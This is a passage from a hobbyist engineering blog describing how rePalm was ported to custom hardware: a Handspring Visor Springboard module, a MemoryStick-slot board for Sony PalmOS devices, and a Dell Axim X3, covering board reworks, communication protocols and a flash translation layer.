Having hardware in-hand is great. It is greater yet when it work right the vey first time. Great like unicorns, and just as likely. Nope... nothing worked right away. The boards did not want to talk to the debugger at all, and after weeks of torture, I realized some pull ups and downs were missing from the boards. This was not an issue on STM's dev boards since they include these pull ups/downs. Once the CPU started talking to me, it became evident very quickly that it was very very unstable. It is specified to run at 180MHz (yes, this means that normally we are overclocking it by 9.2% to 196.6MHz). On the reSpring boards the CPU would not run with anystability over 140MHz. I checked power supply, and decoupling caps. All seemed to be in place, until... No VCAP1 and VCAP2. The CPU core runs at a lower voltage than 3.3V, so the CPU has an internal regulator. This regulator needs capacitors to stabilize its output in the face of variable consumption by the CPU. That is what VCAP1 and VCAP2 pins are for. Well, the board had no capacitors on VCAP1 and VCAP2. The internal regulator output was swinging wildly (+/- 600mV on a 1.8V supply is a lot of swing!). In fact, it is amazing that the CPU ran at all with such an unstable supply! Well, after another rework under the microscope with two capacitors were added, the board was stable. On to the next problem...

The next issue was SDRAM. The main place the code runs from and data is stored. The interface seemed entirely borked. Any word that was written, the 15th bit would always read as 1, and 0th and 1st bits would always read as a zero. Needless to say, this is not acceptable for a RAM which I hoped to run code from. This was a giant pain to debug, but in the end it there out to be a typo in GPIO config not mapping the two lower bits to be SDRAM DQ0 and DQ1. This left only bit 15 stuck high to resolve. That issue did not replicate on other boards, so that was a local issue to one board. A lot of careful microscoping revealed a gob of solder under the pin left from PCBA, which was shorting to a nearby pin that was high. Lifting the pin, wicking the solder off, and reconnecting the pin to the PCB resolved this issue. SDRAM now worked. Since this SDRAM was quite different than the one on the STM32F429 discovery board, I had to dig up the configs to use for it, and translate between the timings STM uses and the RAM datasheet uses to come up with proper settings. The result was quite fast SDRAM which seems stable. Awesome!

Of course this was not nearly the end of it. I could not access the dual-ported SRAM at all. A quick check with the board layout revelaed that its chip select pin was not at all wired to the STM. Out came the microscope and soldering iron, and a wire was added. Lo and behold, SRAM was accessible. More datasheet reading ensued to configure it properly. While doing that, I noticed that it's power consumption is listed as "low" , just 380 mW!!! So not only is this the most expensive chip on the board, it is also the most power hungry! It really needs to go!

I can tell you of more reworks that followed after some in-Visor testing, just to keep all the rework story together. It turned out that the line to interrupt the visor was never connected anywhere, so I wired that up to PA4, so that reSpring could send an IRQ to the visor. Also it turned out that SRAM has a lot of "modes" and it was configured for the wrong one. Three separate pins had to be reworked to switch it from "master" mode into "slave" mode. These modes configure how multiple such SRAMs can be used together. As reSpring only has one, logically it was configured as master. This turns out to have been wrong. Whoops.

Let's stick it into a Visor?

Getting recognized

reSpring module recognized by the Visor

So simple, right? Just stick it into the Visor and be done with it? Reading and re-reading the Handspring Springboard Development Guide provided almost all the info needed, in theory. Practice was different. For some reason, no matter how I formatted the fake ROM in the shared SRAM, the Visor would not recognize it. Finally I gave up on this approach, and wrote a test app to just dump what the Visor sees to screen, in a series of messageboxes. Springboard ROM is always mapped at 0x28000000 . I quickly realized the issues. First, the visor Springboard byteswaps all accesses. This is because most of the world is little-endian, while the 68k CPU is big-endian. To allow peripheral designers to not worry, Handspring byteswaps the bus. "But," you might say, "what about non-word accesses?" There are no such accesses. Visor always accesses 16 bits at a time. There are no byte-select lines. For us this is actually kind of cool. As long as we communicate using only 16-bit quantities, no byteswapping in software is needed. There was another issue: the Visor saw every other word that reSpring wrote. This took some investigation, but the result was both hilarious and sad at the same time. Despite all accesses to Springboard being 16-bit-wide, address line 0 is wired to the Springboard connector. Why? Who knows? But it is always low. On reSpring board, Springboard connector's A0 was wired to RAM's A0. But since it is always 0, this means the Visor can only access every other word of RAM - the even addresses. ...sigh... So we do not have 4K of shared RAM. We have 2K... But, now that we know all this, can we get the visor to recognize reSpring as a Springboard module? YES! . The image on the right was taken the first time the reSpring module was recognized by the Visor.

Saving valuable space

Of course, this was only the beginning of the difficulties. Applications run right from the ROM of the module. This is good and bad. For us this is mostly bad. What does this mean? The ROM image we put in the SRAM must remain there, forever. So we need to make it as small as possible. I worked very hard to minimize the size, and got it down to about 684 bytes. Most of my attempts to overlap structures to save space did not work - the Visor code that validates the ROM on the Springboard module is merciless. The actual application is tiny. It implements the simplest possible messaging protocol (one word at a time) to communicate with the STM. It implements no graphics support and no pen support. So what does it do? It downloads a larger piece of code, one word at a time, from the STM. This code is stored in the Visor's RAM and can run from there. It then simply jumps to that code. Why? This allows us to save valuable SRAM space. So we end up with 2K - 684bytes = 1.3K of ram for sending data back and forth. Not much but probably passable.

Communications

So, we have 1.3KB of shared RAM, an interrupt going each way, how do we communicate? I designed two communications protocols: a simple one and a complex one. The simple one is used only to bootstrap the larger code into Visor RAM. It sends a single 16-bit message and gets a single 16-bit response. The messages implemented are pretty basic: a request to reply - just to check comms, a few requests to get information on where in the shared memory the large mailboxes are for the complex protocol, a request for how big the downloaded code is, and the message to download the next word of code. Once the code is downloaded and knows what the locations and sizes of mailboxes are, it uses the complex protocol. How does it differ? A large chunk of data is placed in the mailbox, and then the simple protocol is used to indicate a request and get a response. The mailboxes are unidirectional, and sized very differently. The STM-to-Visor mailbox occupies about 85% of the space, while the mailbox in the other direction is tiny. The reason is obvious - screen data is large.

All requests are always originated from the Visor and get a response from the reSpring module. If the module has something to tell the Visor, it will raise an IRQ, and the visor will send a request for the data. If the visor has nothing to send, it will simply send an empty NOP message. How does the Visor send a request? First, the data is written to the mailbox, then the message type is written to a special SRAM location, and then a special marker indicating that the message is done is written to another SRAM location. An IRQ is then raised to the module. The IRQ handler in the STM looks for this "message valid" marker, and if it is found the message is read and replied to: first the data is written to the mailbox, then message type is written to the shared SRAM location for message type, and then the "this is a reply" marker is written to the marker SRAM location. This whole time, the Visor is simply loop-reading the marker SRAM location waiting for it to change. Is this busy waiting a problem? No. The STM is so fast, and the code to handle the IRQ does so little processing that the replies often come in microseconds.

A careful reading of the Handspring Springboard Development Guide might leave you with a question: "what exactly do you mean when you say 'interrupt to the module'? There are no pins that are there for that!" Indeed. There are, however, two chip-select lines going to the module. The first must address the ROM (SRAM for us). The chip-select line second is free for the module to use. Its base address in Visor's memory map is 0x29000000 . We use that as the IRQ to the STM, and simply access 0x29000000 to cause an interrupt to the STM.

Early Visor support

At this point, some basic things could be tested, but they all failed on Visor Deluxe and Visor Solo. In fact, everything crashed shortly after the module was inserted. Why? Actually the reason is obvious - they run PalmOS 3.1, while all other Visors ran PalmOS 3.5. A surprising number of APIs one comes to rely on in PalmOS programming are simply not available on PalmOS 3.1. Such simple things like ErrAlertCustom() , BmpGetBits() , WinPalette() , and WinGetBitmap() simply do not exist. I had to write code to avoid using these in PalmOS 3.1. But some of them are needed. For example, how do I directly copy bits into the display framebuffer if I cannot get a pointer to the framebuffer via BmpGetBits( WinGetBitmap( WinGetDisplayWindow ())) ? I attempted to just dig into the structures of windows and bitmaps myself, but it turns out that the display bitmap is not a valid bitmap in PalmOS 3.1 at all. At the end, I realized that PalmOS 3.1 only supported MC68EZ328 and MC68328 processors, and both of them configure the display controller base address in the same register, so I just read it directly. As for palette setting, it is not needed since PalmOS 3.1 does not support color or palettes. Easy enough.

Making it work well

Initial data

Visor showing garbled OS5.2 touch screen calibration dialog

Some data is needed by rePalm before it can properly boot: screen resolution and supported depths, hardware flags (eg: whether screen has brightness or contrast adjustment), and whether the device as an alert LED (yes, you read that right, more on this later). Thus rePalm does not boot until it gets a "continue boot" message that is sent by the code on the Visor once it collects all this info.

Sending display data

The highest-bandwidth data we need to transfer between the Visor and the reSpring module is the display data. For example for a 160x160 scren at 16 bits per pixel at 60 FPS, we'd need to transfer 160x160x16x60 = 23.44Mbps. Not a low data rate at all to attempt on a 33MHz 68k CPU. In fact, I do not think this is even possible. For 4 bits-per-pixel greyscale the numbers look a little better: 160x160x4x60 = 5.86Mbps. But there is a second problem. Each message needs a full round trip. We are limited by Visor's interrupt latency and our general round-trip latency. Sadly that latency is as high as 2-4ms. So we need to minimize the number of packets sent. We'll come back to this later. Initially I just sent the data piecewise and displayed it onscreen. Did it work the first time? Actually, almost. The image to the right shows the results. All it took was a single byteswap to get it to work perfectly!

It was quite slow, however - about 2 frames per second. Looking into it, I realized that the call to MemMove was one of the reasons. I wrote a routine optimized to move the large chunks of data, given that it was not overlapped and always aligned. This improved the refresh rate to about 8 frames per second on the greyscale devices. More improvement was needed. The major issue was the round trip time of copying data, waiting, copying it out, and so on. How do we minimize the number of round trips? Yup - compress the data. I wrote a very very fast lossless image compressor on the STM. It works somewhat like LZ, with a hashtable to find previous occurrences of a data pattern. The compression rations were very very good, and refresh rates went up to 30-40 FPS on the greyscale devices. Color Bejeweled became playable even!

Actually getting the display data was also quite interesting. PalmOS 5 expects the display to just be a framebuffer that may be written to freely. While there are API to draw, one may also just write to the framebuffer. This means that there isn't really a way to get notified when the image onscreen changes. We could send screen data constantly. In fact, this is what I did initially. This depletes the Visor battery at about two percent a minute since the CPU is constantly busy. Clearly this is not the way to go. But how can we get notified when someone draws? The solution is a fun one: we use the MPU. We can protect the framebuffer from writes. Reads are allowed but any write causes an exception. We handle the exception by setting a timer for 1/60 of a second later, and then permit the writes and return. The code that was drawing them resumes, none the wiser. When our timer fires, we re-lock the framebuffer, and request to transfer a screenful of data to Visor. This allows us to not send the same data over and over. Sometimes writes to screen also change nothing, so I later added a second layer where anytime we send a screenful of data, we keep a copy, and next time we're asked to send, we compare, and do nothing if the image is the same. Together with compression, these two techniques bring us to a reasonable power usage and screen refresh rate.

Buttons, pen, brightness, contrast, and battery info

Since the Visor can send data to the reSpring module anytime it wishes, sending button and pen info is easy, just send a message with the data. For transferring data the other way, the design is also simple. If the module requests an IRQ, the visor will send a NOP message, in reply the module will send its request. There are requests for setting display palette, brightness, contrast, or battery info. Visor will perform the requested action, and perhaps reply (eg: for battery info).

Microphone support

The audio amp turned out to be quite miswired on v1 boards, but after some complicated reworks, it was possible to test basic audio recording functionality. It worked! Due to how the reworks worked, the qulity was not stellar, but I could recognize my voice as I said "1 2 3 4 5 6 7" to the voice memo app. But, in reality, amplifying the visor mic is a huge pain - we need a 40dB gain to get anything useful out of the ADC. The analog components of doing this properly and noise-free are just too expensive and numerous, so for v2 it was decided to just populate a digital mic on the board - it is actually cheaper. Plus, no analog is the best amount of analog for a board!

Polish

Serial/IrDA

I support forwarding the Visor's serial port to reSpring. What is this for? HotSync (works) and IR beaming (mostly works). This is actually quite a hard problem to solve. To start with, in order to support PalmOS 3.1, one must use the Old Serial Manager API. I had never used them since PalmOS 4.5 introduced the New Serial Manager and I had almost never written any code for PalmOS before 4.1. The APIs are actually similar, and both quite hostile to what we need. We need to be able to be told when data arrives, without busy-waiting for it. Seemingly there is no API for this. Repeatedly and constantly checking for data works, but wastes battery. Finally I figured out that by using the "receive window" and "wakeup handler" both of which are halfway-explained in the manual, I can get what I need - a callback when data arrives. I also found that, while lightly documented, there is a way to give the Serial manager a larger recieve buffer. This allows us to not drop received data even if we take a few milliseconds to get it out of the buffer. I was able to use all of this to wire up Visor's serial port to a driver in reSpring. Sadly, beaming requires a rather quick response rate, which is hard to reach with our round-trip latency. Beaming works, but not every time. Hotsync does work, even over USB.

Alarm LED

Since rePalm supports alarm LEDs and some Visors have LEDs (Pro, Prism, and Edge), I wanted to wire one up to the other. There are no public API for LED access in the Handspring devices. Some reverse engineering showed that Handspring HAL does have a function to set the LED state: HalLEDCommand() . It does precisely what I want, and can be called simply as TRAP #1; dc.w 0xa014 . There is an issue. Earlier versions of Handspring HAL lack this function, and if you attempt to call it, they will crash. "Surely," you might say, "all devices that support the LED implement this function!" Nope... Visor Prism devices sold in the USA do not. The EFIGS version does, as do all later devices. This convenient hardware-independent function was not available to me thus. What to do? Well, there are only three devices that have a LED, and I can detect them. Let's go for direct hardware access then! On the visor edge the LED is on GPIO K4, on the Pro, it is K3, and on the Prism it is C7. We can write this GPUI directly and it works as expected.

Visor showing garbled OS5.2 touch screen calibration dialog

There are two driver modes for LED and vibrator in rePalm - simple and complex. Simple mode has rePalm give the LED/vibrator very simple "turn on now" "turn off now" commands. This is suitable for a directly wired LED/vibrator. In the reSpring case we actually prefer to use the complex driver, where the OS tells us "here is the LED/vibrator pattern, here is how fast to perform it, this many times, with this much time in between. This is suitable for when you have an external controller that drives the LED/vibrator. Here we do have one: the Visor is our external controller. So we simply send these commands to the Visor and our downloaded code performs the proper actions using a simple state machine.

Software update

I wanted reSpring to be able to self-update from SD card. How could this be accomplished? Well, the flash in the STM32 can be written by code running on the STM32, so logically it should not be hard. A few complications exist: to start with, the entire PalmOS is running form flash, including drivers for various hardware pieces. Our comms layer to talk to the Visor is also in there. So to perform the update we need to stop the entire OS and disable all interrupts and drivers. OK, that is easy enough, but among those drivers are the drivers for the SD card, where our update is. We need that. Easy to solve: copy the update to RAM before starting the update - RAM needs no drivers. But how do we show the progress to the user - our framebuffer is not real, making visor show it requires a lot of code and working interrupts. There was no chance this would work as normal.

I decided that the best way to do this was to have the Visor draw the update UI itself, and just use a single SRAM location to show progress. Writing a single SRAM location is something our update process can do with no issues since the SRAM needs no drivers - it is just memory mapped. The rest was easy: a program to load the update into RAM, send the "update now" message, and then flash the ROM, all the while writing to the proper SRAM location the "percent completed". This required exporting the "send a message" API from the rePalm DAL for applications to use. I did that.

Onboard NAND

You wanted pain? Here's some NAND

The reSpring board has 256MB of NAND flash on a QSPI bus. Why? Because at the time it was designed, I thought it would be cool, and it was quite cheap. NAND is the storage technology underlying most modern storage - your SD cards, your SSD, and the storage in your phone. But, NAND is hard - it has a number of anti-features that make it rather difficult to use for storage. First, NAND may not properly store data - error correction is needed as it may occasionally flip a bit or two. Worse, more bit flips may accumulate over time, to a point where error correction may not be enough, necessitating moving data when such a time approaches. The smallest addressable unit of NAND is a page. That is the size of NAND that may be read or programmed. Programming only flips one bits to zero, not the reverse. The only way to get one bits back is an erase operation. But that operates on a block - a large collection of pages. Because you need error correcting codes, AND bits can only be flipped from one to zero, overwriting data is hard (since the ECC code you use almost certainly will need more ones). There are usually limits to how many times a page may be programmed between erases anyways. There are also usually requirements that pages in a block be programmed in order. And, for extra fun, blocks may go bad (failing to erase or program). In fact a NAND device may ship with bad blocks directly from the factory! Clearly this is not at all what you think of when you imagine block storage. NAND requires careful management to use for storage. Since blocks die due to wear, caused by erasing, you want to evenly wear across the entire device. This may in turn necessitate movinig more data. At the same time while you move data, power may go out so you need to be careful when and what is erased and where it is written. Keeping a consistent idea of what is stored where is hard. This is the job of an FTL - a flash translation layer. An FTL takes the mess that is nand and presents it as a normal block device with a number of sectors which maybe read and written to randomly, with no concern for things like error correction, erase counts, and page partial programming limits.

To write an FTL...

I had written an FTL long ago, so I had some basic idea of the process involved. This was, however, more than a decade ago. It was fun to try to do it again, but better. This time I set out with a few goals. The number one priority was to absolutely never lose any data in face of random power loss since the module may be removed from the Visor randomly at any time. The FTL I produced will never lose any data, no matter when you randomly cut its power. A secondary priority was to minimize the amount of RAM used, since, afterall, reSpring only has 8MB of it!

The pages in the NAND on reSpring are 2176 bytes in size. Of that, 4 are reserved for "bad block marker", 28 are free to use however you wish, with no error correction protection, and the rest is split into 4 equal parts of 536 bytes, which, if you desire, the chip can error-correct (by using the last 16 of those bytes for the ECC code). This means that per page we have 2080 error-corrected bytes and 28 non-error-corrected bytes. Blocks are 64 pages each, and the device has 2048 blocks, of which they promise at least 2008 will be good from the factory. Having the chip do the ECC for us is nice - it has a special hardware unit and can do it much faster then our CPU ever could in software. It will even report to us how many bits were corrected on each read. This information is vital because it tells us about the health of this page and thus informs our decision as to when to relocate the data before it becomes unreadable.

I decided that I would like my FTL to present itself as a block device with 4K blocks. This is the cluster size FAT16 should optimally use on our device, and having larger blocks allows us to have a smaller mapping table (the map from virtual "sector number" to real "page number"). Thus we'd treat two pages together as one always. This means that each of our virtual pages will have 4160 bytes of error-corrected data and 56 bytes of non-erorr corrected data. Since our flash allows writing the same page twice, we'll use the un-error-corrected area ourselves with some handmade error corection to store some data we want to persist. This will be things like how many times this block has been erased, same for prev and next blocks, and the current generation counter to figure out how old the information is. The handmade ECC was trivial: hamming code to correct up to one bit of error, and then replicate the info plus the hamming code three times. This should provide enough protection. Since this only used the un-error-corrected part of the pages, we can then easily write error-correctd-data over this with no issues. Whenever we erase a page, we write this data to it immediately. If we are interrupted, the pages around it have the info we need and we can resume said write after power is back on.

The error-corected data contains the user data (4096 bytes of it) and our service data, such as what vitual sector this data is for, generation counter, info on this and a few neighboring blocks, and some other info. This info allows us to rebuild the mapping table after a power cycle. But clearly reading the entire device each power on is slow and we do not want to do this. We thus support checkpoints. Whenever the device is powered off, or the FTL is unmounted, we write a checkpoint. It contains the mapping data and some other info that allows us to quickly resume operation without scanning the entire device. Of course in case of an unexpected power off we do need to do a scan. For those cases there is an optimization too - a directory at the end of each block tells us what it contains - this allows the scan to read only 1/32nd of the device instead of 100% of it - a 32x speedup!

Read and write requests from PalmOS directly map to the FTL layer's read and write. Except there is a problem - PalmOS only supports block devices with sector sizes of 512 bytes. I wrote a simple translation layer that does read-modify-write as needed to map my 4K sectors to PalmOS's 512-byte sectors, if PalmOS's request did not perfectly align with the FTL's 4K sectors. This is not as scary or as slow as you imagine it, because PalmOS uses FAT16 to format the device. When it does, it asks the device about its preferred block size. We repy with 4K and from then on, PalmOS's FAT driver only writes complete 4K clusters - which align perfectly with out 4K FTL sectors. The runtime memory usage of the FTL is only 128KB - not bad at all, if I do say so myself! I wrote a very torturous set of tests for the FTL and ran it on my computer over a few nights. The test simulated data going bad, power off randomly, etc. The FTL passed. There is actually a lot more to this FTL, and you are free to go look at the source code to see more.

One final WTF

Among all this work, rePalm worked well, mostly. Occasionally it would lose a message from the Visor to the module or vice-versa. I spent a lot of time debugging this and came to a startling realization. The dual-ported SRAM does not actually support simultaneous access to the same address by both ports at once. This is documented in its datasheet as a "helpful feature" but it is anything but. Now, it might be reasonable to not allow two simultaneous writes to the same word, sure. But two reads should work, and a read and a write should work too (with a read returning the old data or the new data, or even a mix of the two). This SRAM instead signals "busy" (which is otherwise never does) to one side. Since it is not supposed to ever be busy, and the Springboard slot does not even have a BUSY pin, these signals were wired nowhere. This is where I found this stuff in the footnote in the manual. It said that switching the chip to SLAVE mode and raising the BUSY pins (which are now inputs) to HIGH will allow simultaneous access. Well, it sort of does. There is no more busy signalling, but sometimes a write will be DROPPED if it is executed concurrently with a read. And a read will sometimes return ZERO if executed concurrently with another read or write, even if the old and new data were both not zero. There seems to be no way around this. Another company's dual-ported SRAM had the same nonsense limitation, leading me to believe that nobody in the industry makes REAL dual-ported SRAMs. This SRAM has something called "semaphores" which can be used to implement actual semaphores that are truly shared by both devices, but otherwise it is not true dual-ported RAM. Damn!

Using these semaphores would require significant rewiring: we'd need a new chip select line going to this chip, and need to invent a new way to interrupt the STM since the second chip select line would be now used to access semaphores. This was beyond my rework abilities, so I just beefed up the protocol to avoid these issues. Now the STM will write each data word that might be concurently read 64 times, and then read it back to verify it was written. The comms protocol was also modified to never ever use zeroes, and thus if a zero is seen, it is clear that a re-read was necessary. With these hacks the communication is stable, but in the next board rev rev I think we'll wire up the semaphores to avoid this nasty hack!

More real hardware

rePalm-MSIO

rePalm-MSIO first board

After documenting the Sony MemoryStick protocol , an opportunity presented itself - why not a rePalm version on a MemoryStick? In theory, I could get a microcontroller to act as a MemoryStick device, load a program unto the host Sony PalmOS device, and then take over it, like reSpring did. That was the idea, of course. The space is tight, and timing requirement insane. The fact that the MemoryStick protocol is so much unlike any normal sane bus means that there will be no simple solutions. However, I was determined to make this work.

MCU selection

STM32F429 and an SDRAM chip together would take up too much space to fit inside a MemoryStick slot. Instead, a 64-pin STM32H7 chip is used. It has 1.25MB of internal ram, which is a bit little for PalmOS. Luckily, it supports a rather rare thing: a read/write QSPI interface - perfect for interfacing with QSPI PSRAM chips like APS6404L from APMemory! This allows for 8MB of RAM without taking up a lot of board space or needing a boatload of pins! STM32H7 is also a Cortex-M7, which is quite an improvement from the Cortex-M4 core in the STM32F429. M7 is faster per-cycle, and has a cache! The fact that STM32F429 had no cache was a serious handicapping factor for it when running code from RAM, since the RAM was limited to half the core clock speed. With a small-enough working set, the M7 can operate at full speed from cache! Cool! There is also TCM - some memory near the core that always operates at full speed with no delay or wait-states!

I laid out the board such that it would fit into the MemoryStick slot. It is a 4-layer board (which is apparently very cheap now). This makes routing easier and signal integrity better. With the proper board thickness, there is just enough space for the chips to fit. It all works, inserts, clicks, everything! Pretty amazing, actually. Of course, there were errors, but by the second revision of the board, only one bodge wire was needed, as you can see in the picture. The board is precisely the size of a MemoryStick. There is extra that sticks out, those are the debugging headers and it is break-away. I have one where I did break it away and it is amazing how well it fits inside.

The bugs...

Of course, this being an STM chip, there were bugs. The chip would sometimes lock up entirely when executing from QSPI RAM. When consulted, ST suggested changing the MPU parameters to make the QSPI RAM uncacheable. This is an idiotic suggestion, because even if it worked (spoiler: it does not), it would make that RAM slow beyond any degree of usefulness. In any case, when I tried that, the RAM gets corrupted. I verified with bus traces and presented ot STM. Eventually they admitted that any writes to the QSPI interface that are not sequential and word-sized will cause corruption. Somehow, that info tells me precisely what was the only test they ever ran on this peripheral. Sigh...

Luckily, with the cache on, the dirty cache-line eviction will always sequentially write an integer number of words, so there is hope. Sadly, the chip would work for a while, and then lock up. The lock up was very strange, my debugger would be unable to connect to the core in this state at all, but it could access the debug access port itself. This lead me to believe that it was not the core that locked up but the internal AHB fabric. I was able to confirm this by attaching to another debugger access port (the one on AHB3), where I could look around but have no access to the main AHB busses. STM had no ideas.

Given what I knew about how AHB buses works, guesses on how ST likely designed the arbiters, and how ST likely wired up their QSPI unit to it all, I guessed at the issue, and a workaround the might work. After some prototyping, I can confirm that it does. The performance cost is about 20% (compared to no workaround enabled), but at least no more hangs. Why am I being so cagey about what the workaround is? Well, while denying the issue exists, STM asked for the precise details of my workaround once they heard I had found one. Apparently an actually-important client also hit this issue. I am currently refusing to disclose the workaround until they agree to admit the issue. So far it is a stalemate, which is fine - I am losing no sales over it. Them...?

MSIO low level

The main signal that controls the protocol phases is BS , and it always leads the actual state transition by a cycle, which makes it very hard to use for anything. If only it were not one cycle early, I could use it (and its inverse) as chip-selects and try to use the hardware SPI bus units somehow. After some head-scratching, a solution became evident. Two flip flops will do. Running the BS signal through them will delay it a cycle. Finding a dual-negative-edge-triggered flip-flop turned out to be impossible, so an inverter was thrown into the mix, so that I could use an easily-available SN74LVC74A .

With the BS signal delayed, it could be used as chip select for some SPI units. To make this work, I wired THREE SPI units together. The first edge of BS Triggers a DMA channel that enables three SPI units: one receives the TPC , and the second and third are ready to receive the data that follows. We'll have no time to validate the TPC in the meantime, so we prime the SPI unit to receive it no matter what. This is harmless. This first BS edge also triggers a software interrupt. Assuming not too many delays, we'll arrive into the IRQ after the TPC has already been received and, if the transaction is a write, the data is already on on the way coming in. If we are less lucky, data might have even already been entirely received. Here we can validate the TPC and check its direction. If this is a READ, we need to send the handshaking pattern immediately, so we use one of the SPI units to do that now. While that goes on, we find the data and queue it up for transmission, telling the SPI unit to also send the CRC after it. If this was a WRITE, we had two SPI units receiving the data. One copied the data to RAM, the second to the CRC unit (STM32H7 cannot CRC incoming data if we do not up front know the length). We quickly check the CRC and configure one of the SPI units to send the handshaking pattern to acknowledge the data.

"Now, this all sounds very fragile," an astute observer would say. Yes! Very. It also means that we cannot ever disable interrupts for very long, since there is only a few cycles of leeway between the data being sent to us and a reply being needed to avoid the host timing out. I had to rearchitect rePalm kernel's interrupt handling a little bit, to allow some interrupts to NEVER be disabled, in return for some concessions from those interrupt handlers: they do not make any syscalls or modify any state shared with any other piece of code. So then how do we interface with them? When an MSIO transaction finishes, the data is placed into a shared buffer, and a software interrupt is triggered, which is handled normally by normal code with normal constraints. This can be disabled, prioritized, etc, since it is not time critical anymore. Of course, all the time-critical code must be run from the ITCM (the tightly-coupled instruction memory) to make the deadlines.

When the STM32H7 runs at 320MHz, this works most of the time with newer palm devices, since they run the MSIO interface at 16MHz, giving me some breathing room. Older devices like the S500C are tougher. They run the MSIO bus at 20MHz, and the timings are very tight. Things work well, but if the core is waiting for instruction fetch from QSPI, it will not jump to the interrupt handler till that compltes, causing larger latency. Sometimes this causes an MSIO interrut handler to be late and miss the proper window to ACK some transaction. My host-side driver retries and papers over this. The real solution is a tiny FPGA to offload this from the main MCU. I'm looking into this.

MSIO high level

rePalm-MSIO running on a PEG-S500C

As there exist no MSIO drivers for rePalm, I had to write and provide them. But how would a user get them unto the device? In theory, as far as my reverse-engieering can tell, a MemoryStick may have multiple functions, possibly memory and one or more IO functions. No such stick was observed in the wild, so I set out to create the first. Why not? The logic of how it should work is rather simple - function 0xFF should be memory, and any other unused function number could be for rePalm IO. I picked the function number 0x64. Why pretend to be memory at all? To give the user the driver, of course!

My code does the minimum to pretend to be a read-only MemoryStick with 4MB of storage. As MemorySticks are raw NAND devices, my code pretends to be a perfect one - no bad blocks, no error correction ever needed. The fake medum is "formatted" with FAT12 and contains a rather curious filesystem indeed. To support ALL the sony devices, the driver is needed in a few places. Anything with PalmOS 4.0 or later will show files in /PALM/LAUNCHER to the user, and will auto-launch /PALM/START.prc on insertion. Anything with earlier PalmOS versions will only allow the user to browse /PALM/PROGRAMS/MSFILES . All but the first Sony devices also had another way to auto-launch an executable on stick insertion - a Sony utiliy called "MS AutoRun". It reads a config file at /DEFAULT.ARN and loads the specified program to RAM on insertion. Auto-run is never triggered if the MemoryStick was aleady inserted at device boot, so we cannot rely on it. This is why we need the file to be itself visible and accessible to the user for manual launching. Let's count then, how many copies of the driver app our MemoryStick needs. One in /PALM/LAUNCHER , one in /PALM/PROGRAMS/MSFILES , and one as /PALM/START.prc . Three copies. Now, this will not do! If only FAT12 supported hard links...

But, wait, if the filesystem is read-only, it DOES support hard links! More than one directory entry may reference the same cluster chain. This is only a problem when the file is deleted, which does not happen to a read-only filesystem. The filesystem thus contains a PALM directory in the root, That contains DEFAULT.ARN file, pointing to a cluster with its contents, a PROGRAMS directory, a LAUNCHER directory, and a directory entry with the name START.PRC pointing to the first cluster of our driver. PROGRAMS contains an MSFILES directory, which itself contains another directory entory pointing to the driver, this one with the name DRIVER.PRC . /PALM/LAUNCHER contains the third directory entry pointing to the driver, also named DRIVER.PRC . PalmOS does not do a file system check on read-only media, so no issue is ever hit - it all works.

MSIO performance

Some Sony devices have actual exported MSIO API in their MemoryStick drivers which I was able to reverse engineer ( and publish ). Some others did not, but Sony published updates that included such API. Usually these updates came with MSIO peripherals like the MemoryStick Bluetooth adapter or the MemoryStick Camera. And some devices never had any official MSIO suport at all. I wanted to support them all, and since I had already reverse engineered how the MemoryStick Host chip (MB86189) worked, I was able to just write my own drivers, talking to it directly. This worked for some devices. Others do not have direct access to the chip, since the DSP controls it. Sony DSP is not documented, the firmware is encrypted, and the key is not known. Here, I was stuck for a while. Eventually I was able to figure out just enough to be able to send and receive raw TPC s via the DSP. This worked well on almost all devices, except the N7xx series devices. Their DSP firmware was the oldest of all (as far as I can tell) and the best bandwidth I was able to coax out of it was 176Kbit/s. Needless to say that this is not quite good enough for live video (basically what rePalm does). It works, but the quality is not great.

As MSIO allows transfers of no more than 512 bytes per transfer, transferring screen image data is complex. The same compression is used here as was used in reSpring. Even then, performance varies based on the device and screen configuration. On low-resolution devices, everything is fast. On high-resolution ones (except N7xx), 35 FPS is reachable in 16bits-per-pixel mode. It is faster on greyscale devices. The lone PalmOS 4 HiRes+ device (NR70V) lags behind at around 20FPS. This is because there is simply so much data to transfer each frame - 300KB.

Other loose ends

Curiously, it seems that Asus licensed the MemoryStick IP from Sony, so the Asus PalmOS devices (s10 and s60 families) also use MemoryStick. I added support for them. For each device, I wired up as much as possible to rePalm. Devices with a LED have it wired to the attention manager, devices with the vibrate motor have that wired up as well. Sound is a bit more complex. Some of these devices had a DSP for MP3 decoding, but the ability to play raw sampled sound is limited, since 68K was unlikely to be able to do it fast enough anyways. There exists a sony API to play 8KHz 4-bits-per-sapme ADPCM. I considered wiring that up to the sound output of rePalm, but did not get around to it. It is likely not worth it as the quality will be atrocious. I did consider the alternative - have rePalm encode its output as MP3, and somehow find a way to feed that to the DSP, but I was stymied in my efforts. In most of the devices, the DSP firmware reads the MP3 file directly from the MemoryStick, bypassing the OS entirely, leading me to believe that I may not find a way to inject MP3 data even if I made it.

Initially, I did the development on STM32H7B0RB. This variant has only 128KB of flash, which is, of course, not enough to contain PalmOS. I used some of the RAM to contain a ROM image, which I loaded over SWD each time. This worked well enough, but was not really fun as it could not be used away from a computer. Luckily, I was able (with a lot of help from an unnamed source) to get some of the STM32H7 chips with 2MB of internal flash. This IS enough to fit PalmOS, so now I have variants that boot directly on insertion. The latest boards also have some onboard NAND flash that acts as a built-in storage device for user using my FTL, mentioned before. The photo album (linked above) has more photos and videos! Here is one . Enjoy!

AximX3

Axim X3 running PalmOS

This was a fun target just for shits and giggles. As this runs an ARMv5T CPU, my kernel was forced to adapt to this world. It was not terribly difficult and it works now. Curiously, this device is rather similar internally to the Palm Tungsten T3, so this same rePalm build can run with few modifications on the T|T3 as well.

I put a lot of work into this device. Luckily, a lot of the initial investigation of the hardware was already done as part of my uARM-Palm project. Almost everything works. Audio in and out work, SD card works, infrared works, touch and buttons work, battery reporting works, and the screen works. Missing is only USB and sleep/wake. The first I see no point in, the second is complicated by the built-in bootloader. Initial builds of this used a WinCE loader I wrote to load the ROM into RAM and run from there. Further investigation of the device ROM indicated to me that there is a rather complete bootloader there, capable of flashing the device ROM from the SD card. I decided to exploit that, and with some changes, now rePalm can be flashed to ROM of the device and boot directly. Yes!

How? The stock bootloader has a mode for this. If an image file is placed on the SD card as /P16R_K0.NB0 , the card is inserted, jog wheel select and the second app button are held, and the device resetted, it'll flash the image to flash, right after the bootloader. This can be used to flash rePalm, or to reflash the stock image. Depending on the AximX3 version (there are three), the amount of flash and RAM differs. rePalm detects the available RAM and uses it all!

STM32F469 Discovery Board

